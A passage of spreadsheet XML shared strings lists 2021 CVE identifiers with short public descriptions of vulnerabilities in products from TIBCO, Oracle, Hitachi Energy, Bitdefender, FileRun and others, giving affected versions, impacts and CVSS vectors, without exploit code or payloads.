    <t>The WebFOCUS Reporting Server and WebFOCUS Client components of TIBCO Software Inc.'s TIBCO WebFOCUS Client, TIBCO WebFOCUS Installer, and TIBCO WebFOCUS Reporting Server contain easily exploitable Stored and Reflected Cross Site Scripting (XSS) vulnerabilities that allow a low privileged attacker to social engineer a legitimate user with network access to execute scripts targeting the affected system or the victim's local system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO WebFOCUS Client: versions 8207.27.0 and below, TIBCO WebFOCUS Installer: versions 8207.27.0 and below, and TIBCO WebFOCUS Reporting Server: versions 8207.27.0 and below.</t>
  </si>
  <si>
    <t>CVE-2021-35494</t>
  </si>
  <si>
    <t>The Rest API component of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server - Community Edition, TIBCO JasperReports Server - Developer Edition, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contain a race condition that allows a low privileged authenticated attacker via the REST API to obtain read access to temporary objects created by other users on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Server: versions 7.2.1 and below, TIBCO JasperReports Server: versions 7.5.0 and 7.5.1, TIBCO JasperReports Server: version 7.8.0, TIBCO JasperReports Server: version 7.9.0, TIBCO JasperReports Server - Community Edition: versions 7.8.0 and below, TIBCO JasperReports Server - Developer Edition: versions 7.9.0 and below, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and below, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and below, and TIBCO JasperReports Server for Microsoft Azure: version 7.8.0.</t>
  </si>
  <si>
    <t>CVE-2021-35495</t>
  </si>
  <si>
    <t>The Scheduler Connection component of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server - Community Edition, TIBCO JasperReports Server - Developer Edition, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains an easily exploitable vulnerability that allows an authenticated attacker with network access to obtain FTP server passwords for other users of the affected system. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Server: versions 7.2.1 and below, TIBCO JasperReports Server: versions 7.5.0 and 7.5.1, TIBCO JasperReports Server: version 7.8.0, TIBCO JasperReports Server: version 7.9.0, TIBCO JasperReports Server - Community Edition: versions 7.8.0 and below, TIBCO JasperReports Server - Developer Edition: versions 7.9.0 and below, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and below, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and below, and TIBCO JasperReports Server for Microsoft Azure: version 7.8.0.</t>
  </si>
  <si>
    <t>CVE-2021-35496</t>
  </si>
  <si>
    <t>The XMLA Connections component of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server, TIBCO JasperReports Server - Community Edition, TIBCO JasperReports Server - Developer Edition, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains a difficult to exploit vulnerability that allows a low privileged attacker with network access to interfere with XML processing in the affected component. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Server: versions 7.2.1 and below, TIBCO JasperReports Server: versions 7.5.0 and 7.5.1, TIBCO JasperReports Server: version 7.8.0, TIBCO JasperReports Server: version 7.9.0, TIBCO JasperReports Server - Community Edition: versions 7.8.0 and below, TIBCO JasperReports Server - Developer Edition: versions 7.9.0 and below, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and below, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and below, and TIBCO JasperReports Server for Microsoft Azure: version 7.8.0.</t>
  </si>
  <si>
    <t>CVE-2021-35497</t>
  </si>
  <si>
    <t>The FTL Server (tibftlserver) and Docker images containing tibftlserver components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition, TIBCO ActiveSpaces - Developer Edition, TIBCO ActiveSpaces - Enterprise Edition, TIBCO FTL - Community Edition, TIBCO FTL - Developer Edition, TIBCO FTL - Enterprise Edition, TIBCO eFTL - Community Edition, TIBCO eFTL - Developer Edition, and TIBCO eFTL - Enterprise Edition contain a vulnerability that theoretically allows a non-administrative, authenticated FTL user to trick the affected components into creating illegitimate certificates. These maliciously generated certificates can be used to enable man-in-the-middle attacks or to escalate privileges so that the malicious user has administrative privileges. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO ActiveSpaces - Developer Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO ActiveSpaces - Enterprise Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO FTL - Community Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO FTL - Developer Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO FTL - Enterprise Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO eFTL - Community Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO eFTL - Developer Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, and TIBCO eFTL - Enterprise Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0.</t>
  </si>
  <si>
    <t>CVE-2021-35498</t>
  </si>
  <si>
    <t>The TIBCO EBX Web Server component of TIBCO Software Inc.'s TIBCO EBX, TIBCO EBX, TIBCO EBX, and TIBCO Product and Service Catalog powered by TIBCO EBX contains a vulnerability that under certain specific conditions allows an attacker to enter a password other than the legitimate password and it will be accepted as valid. Affected releases are TIBCO Software Inc.'s TIBCO EBX: versions 5.8.123 and below, TIBCO EBX: versions 5.9.3, 5.9.4, 5.9.5, 5.9.6, 5.9.7, 5.9.8, 5.9.9, 5.9.10, 5.9.11, 5.9.12, 5.9.13, and 5.9.14, TIBCO EBX: versions 6.0.0 and 6.0.1, and TIBCO Product and Service Catalog powered by TIBCO EBX: version 1.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-35499</t>
  </si>
  <si>
    <t>The Web Reporting component of TIBCO Software Inc.'s TIBCO Nimbus contains easily exploitable Stored Cross Site Scripting (XSS) vulnerabilities that allow a low privileged attacker to social engineer a legitimate user with network access to execute scripts targeting the affected system or the victim's local system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO Nimbus: versions 10.4.0 and below.</t>
  </si>
  <si>
    <t>CVE-2021-3550</t>
  </si>
  <si>
    <t>A DLL search path vulnerability was reported in Lenovo PCManager, prior to version 3.0.500.5102, that could allow privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-35500</t>
  </si>
  <si>
    <t>The Data Virtualization Server component of TIBCO Software Inc.'s TIBCO Data Virtualization, TIBCO Data Virtualization, TIBCO Data Virtualization, and TIBCO Data Virtualization for AWS Marketplace contains a difficult to exploit vulnerability that allows a low privileged attacker with local access to download arbitrary files outside of the scope of the user's permissions on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Data Virtualization: versions 8.3.0 and below, TIBCO Data Virtualization: version 8.4.0, TIBCO Data Virtualization: version 8.5.0, and TIBCO Data Virtualization for AWS Marketplace: versions 8.5.0 and below.</t>
  </si>
  <si>
    <t>CVE-2021-35501</t>
  </si>
  <si>
    <t>PandoraFMS &lt;=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.</t>
  </si>
  <si>
    <t>CVE-2021-35502</t>
  </si>
  <si>
    <t>app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp in MISP 2.4.144 does not sanitize certain data related to generic-template:index.</t>
  </si>
  <si>
    <t>CVE-2021-35503</t>
  </si>
  <si>
    <t>Afian FileRun 2021.03.26 allows stored XSS via an HTTP X-Forwarded-For header that is mishandled when rendering Activity Logs.</t>
  </si>
  <si>
    <t>CVE-2021-35504</t>
  </si>
  <si>
    <t>Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the ffmpeg binary.</t>
  </si>
  <si>
    <t>CVE-2021-35505</t>
  </si>
  <si>
    <t>Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the magick binary.</t>
  </si>
  <si>
    <t>CVE-2021-35506</t>
  </si>
  <si>
    <t>Afian FileRun 2021.03.26 allows XSS when an administrator encounters a crafted document during use of the HTML Editor for a preview or edit action.</t>
  </si>
  <si>
    <t>CVE-2021-35508</t>
  </si>
  <si>
    <t>NMSAccess32.exe in TeraRecon AQNetClient 4.4.13 allows attackers to execute a malicious binary with SYSTEM privileges via a low-privileged user account. To exploit this, a low-privileged user must change the service configuration or overwrite the binary service.</t>
  </si>
  <si>
    <t>CVE-2021-3551</t>
  </si>
  <si>
    <t>A flaw was found in the PKI-server, where the spkispawn command, when run in debug mode, stores admin credentials in the installation log file. This flaw allows a local attacker to retrieve the file to obtain the admin password and gain admin privileges to the Dogtag CA manager. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-35512</t>
  </si>
  <si>
    <t>An SSRF issue was discovered in Zoho ManageEngine Applications Manager build 15200.</t>
  </si>
  <si>
    <t>CVE-2021-35513</t>
  </si>
  <si>
    <t>Mermaid before 8.11.0 allows XSS when the antiscript feature is used.</t>
  </si>
  <si>
    <t>CVE-2021-35514</t>
  </si>
  <si>
    <t>Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the title name or author name of a novel.</t>
  </si>
  <si>
    <t>CVE-2021-35515</t>
  </si>
  <si>
    <t>When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.</t>
  </si>
  <si>
    <t>CVE-2021-35516</t>
  </si>
  <si>
    <t>When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.</t>
  </si>
  <si>
    <t>CVE-2021-35517</t>
  </si>
  <si>
    <t>When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.</t>
  </si>
  <si>
    <t>CVE-2021-3552</t>
  </si>
  <si>
    <t>A Server-Side Request Forgery (SSRF) vulnerability in the EPPUpdateService component of Bitdefender Endpoint Security Tools allows an attacker to proxy requests to the relay server. This issue affects: Bitdefender Endpoint Security Tools versions prior to 6.6.27.390; versions prior to 7.1.2.33. Bitdefender GravityZone 6.24.1-1.</t>
  </si>
  <si>
    <t>CVE-2021-35520</t>
  </si>
  <si>
    <t>A Buffer Overflow in Thrift command handlers in IDEMIA Morpho Wave Compact and VisionPass devices before 2.6.2 allows physically proximate authenticated attackers to achieve code execution, denial of services, and information disclosure via serial ports.</t>
  </si>
  <si>
    <t>CVE-2021-35521</t>
  </si>
  <si>
    <t>A path traversal in Thrift command handlers in IDEMIA Morpho Wave Compact and VisionPass devices before 2.6.2 allows remote authenticated attackers to achieve denial of services and information disclosure via TCP/IP packets.</t>
  </si>
  <si>
    <t>CVE-2021-35522</t>
  </si>
  <si>
    <t>A Buffer Overflow in Thrift command handlers in IDEMIA Morpho Wave Compact and VisionPass devices before 2.6.2, Sigma devices before 4.9.4, and MA VP MD devices before 4.9.7 allows remote attackers to achieve code execution, denial of services, and information disclosure via TCP/IP packets.</t>
  </si>
  <si>
    <t>CVE-2021-35523</t>
  </si>
  <si>
    <t>Securepoint SSL VPN Client v2 before 2.0.32 on Windows has unsafe configuration handling that enables local privilege escalation to NT AUTHORITY\SYSTEM. A non-privileged local user can modify the OpenVPN configuration stored under "%APPDATA%\Securepoint SSL VPN" and add a external script file that is executed as privileged user.</t>
  </si>
  <si>
    <t>CVE-2021-35525</t>
  </si>
  <si>
    <t>PostSRSd before 1.11 allows a denial of service (subprocess hang) if Postfix sends certain long data fields such as multiple concatenated email addresses. NOTE: the PostSRSd maintainer acknowledges "theoretically, this error should never occur ... I'm not sure if there's a reliable way to trigger this condition by an external attacker, but it is a security bug in PostSRSd nevertheless."</t>
  </si>
  <si>
    <t>CVE-2021-35526</t>
  </si>
  <si>
    <t>Backup file without encryption vulnerability is found in Hitachi ABB Power Grids System Data Manager – SDM600 allows attacker to gain access to sensitive information. This issue affects: Hitachi ABB Power Grids System Data Manager – SDM600 1.2 versions prior to FP2 HF6 (Build Nr. 1.2.14002.257).</t>
  </si>
  <si>
    <t>CVE-2021-35527</t>
  </si>
  <si>
    <t>Password autocomplete vulnerability in the web application password field of Hitachi ABB Power Grids eSOMS allows attacker to gain access to user credentials that are stored by the browser. This issue affects: Hitachi ABB Power Grids eSOMS version 6.3 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-35528</t>
  </si>
  <si>
    <t>Improper Access Control vulnerability in the application authentication and authorization of Hitachi Energy Retail Operations, Counterparty Settlement and Billing (CSB) allows an attacker to execute a modified signed Java Applet JAR file. A successful exploitation may lead to data extraction or modification of data inside the application. This issue affects: Hitachi Energy Retail Operations 5.7.3 and prior versions. Hitachi Energy Counterparty Settlement and Billing (CSB) 5.7.3 prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-35529</t>
  </si>
  <si>
    <t>Insufficiently Protected Credentials vulnerability in client environment of Hitachi ABB Power Grids Retail Operations and Counterparty Settlement Billing (CSB) allows an attacker or unauthorized user to access database credentials, shut down the product and access or alter. This issue affects: Hitachi ABB Power Grids Retail Operations version 5.7.2 and prior versions. Hitachi ABB Power Grids Counterparty Settlement Billing (CSB) version 5.7.2 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-3553</t>
  </si>
  <si>
    <t>A Server-Side Request Forgery (SSRF) vulnerability in the EPPUpdateService of Bitdefender Endpoint Security Tools allows an attacker to use the Endpoint Protection relay as a proxy for any remote host. This issue affects: Bitdefender Endpoint Security Tools versions prior to 6.6.27.390; versions prior to 7.1.2.33. Bitdefender Unified Endpoint for Linux versions prior to 6.2.21.160. Bitdefender GravityZone versions prior to 6.24.1-1.</t>
  </si>
  <si>
    <t>CVE-2021-35530</t>
  </si>
  <si>
    <t>A vulnerability in the application authentication and authorization mechanism in Hitachi Energy's TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, and further gain authorized access into the system via login mechanism. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.</t>
  </si>
  <si>
    <t>CVE-2021-35531</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in a particular configuration setting field of Hitachi Energy TXpert Hub CoreTec 4 product, allows an attacker with access to an authorized user with ADMIN or ENGINEER role rights to inject an OS command that is executed by the system. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0; 2.0.1; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.</t>
  </si>
  <si>
    <t>CVE-2021-35532</t>
  </si>
  <si>
    <t>A vulnerability exists in the file upload validation part of Hitachi Energy TXpert Hub CoreTec 4 product. The vulnerability allows an attacker or malicious agent who manages to gain access to the system and obtain an account with sufficient privilege to upload a malicious firmware to the product. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0; 2.0.1; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.</t>
  </si>
  <si>
    <t>CVE-2021-35533</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in the APDU parser in the Bidirectional Communication Interface (BCI) IEC 60870-5-104 function of Hitachi Energy RTU500 series allows an attacker to cause the receiving RTU500 CMU of which the BCI is enabled to reboot when receiving a specially crafted message. By default, BCI IEC 60870-5-104 function is disabled (not configured). This issue affects: Hitachi Energy RTU500 series CMU Firmware version 12.0.* (all versions); CMU Firmware version 12.2.* (all versions); CMU Firmware version 12.4.* (all versions).</t>
  </si>
  <si>
    <t>CVE-2021-35534</t>
  </si>
  <si>
    <t>Insufficient security control vulnerability in internal database access mechanism of Hitachi Energy Relion 670/650/SAM600-IO, Relion 650, GMS600, PWC600 allows attacker who successfully exploited this vulnerability, of which the product does not sufficiently restrict access to an internal database tables, could allow anybody with user credentials to bypass security controls that is enforced by the product. Consequently, exploitation may lead to unauthorized modifications on data/firmware, and/or to permanently disabling the product. This issue affects: Hitachi Energy Relion 670 Series 2.0 all revisions; 2.2.2 all revisions; 2.2.3 versions prior to 2.2.3.5. Hitachi Energy Relion 670/650 Series 2.1 all revisions. 2.2.0 all revisions; 2.2.4 all revisions; Hitachi Energy Relion 670/650/SAM600-IO 2.2.1 all revisions; 2.2.5 versions prior to 2.2.5.2. Hitachi Energy Relion 650 1.0 all revisions. 1.1 all revisions; 1.2 all revisions; 1.3 versions prior to 1.3.0.8; Hitachi Energy GMS600 1.3.0; 1.3.0.1; 1.2.0. Hitachi Energy PWC600 1.0.1 version 1.0.1.4 and prior versions; 1.1.0 version 1.1.0.1 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-35535</t>
  </si>
  <si>
    <t>Insecure Boot Image vulnerability in Hitachi Energy Relion Relion 670/650/SAM600-IO series allows an attacker who manages to get access to the front network port and to cause a reboot sequences of the device may exploit the vulnerability, where there is a tiny time gap during the booting process where an older version of VxWorks is loaded prior to application firmware booting, could exploit the vulnerability in the older version of VxWorks and cause a denial-of-service on the product. This issue affects: Hitachi Energy Relion 670 Series 2.2.2 all revisions; 2.2.3 versions prior to 2.2.3.3. Hitachi Energy Relion 670/650 Series 2.2.0 all revisions; 2.2.4 all revisions. Hitachi Energy Relion 670/650/SAM600-IO 2.2.1 all revisions.</t>
  </si>
  <si>
    <t>CVE-2021-35536</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Deal Management product of Oracle E-Business Suite (component: Miscellaneous). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Deal Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Deal Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Deal Management accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35537</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.2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35538</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability does not apply to Windows systems. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35539</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-3554</t>
  </si>
  <si>
    <t>Improper Access Control vulnerability in the patchesUpdate API as implemented in Bitdefender Endpoint Security Tools for Linux as a relay role allows an attacker to manipulate the remote address used for pulling patches. This issue affects: Bitdefender Endpoint Security Tools for Linux versions prior to 6.6.27.390; versions prior to 7.1.2.33. Bitdefender Unified Endpoint versions prior to 6.2.21.160. Bitdefender GravityZone versions prior to 6.24.1-1.</t>
  </si>
  <si>
    <t>CVE-2021-35540</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35541</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise SCM product of Oracle PeopleSoft (component: Supplier Portal). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise SCM, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise SCM accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35542</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35543</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise CC Common Application Objects product of Oracle PeopleSoft (component: Activity Guide Composer). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise CC Common Application Objects. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise CC Common Application Objects accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise CC Common Application Objects accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35545</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28.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and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.7 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:H).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-35546</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.2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35549</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Utility). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 3.9 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-3555</t>
  </si>
  <si>
    <t>A Buffer Overflow vulnerability in the RSTP server component of Eufy Indoor 2K Indoor Camera allows a local attacker to achieve remote code execution. This issue affects: Eufy Indoor 2K Indoor Camera 2.0.9.3 version and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-35550</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all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9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35551</t>
  </si>
  <si>
    <t>Vulnerability in the RDBMS Security component of Oracle Database Server. Supported versions that are affected are 12.2.0.1, 19c and 21c. Easily exploitable vulnerability allows high privileged attacker having DBA privilege with network access via Oracle Net to compromise RDBMS Security. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of RDBMS Security as well as unauthorized update, insert or delete access to some of RDBMS Security accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35552</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Diagnostics). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35553</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise CS Student Records product of Oracle PeopleSoft (component: Class Search). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise CS Student Records. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise CS Student Records, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise CS Student Records accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise CS Student Records accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35554</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: Quotes). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Trade Management accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35556</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of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1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35557</t>
  </si>
  <si>
    <t>Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Table privilege with network access via Oracle Net to compromise Core RDBMS. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Core RDBMS. CVSS 3.1 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35558</t>
  </si>
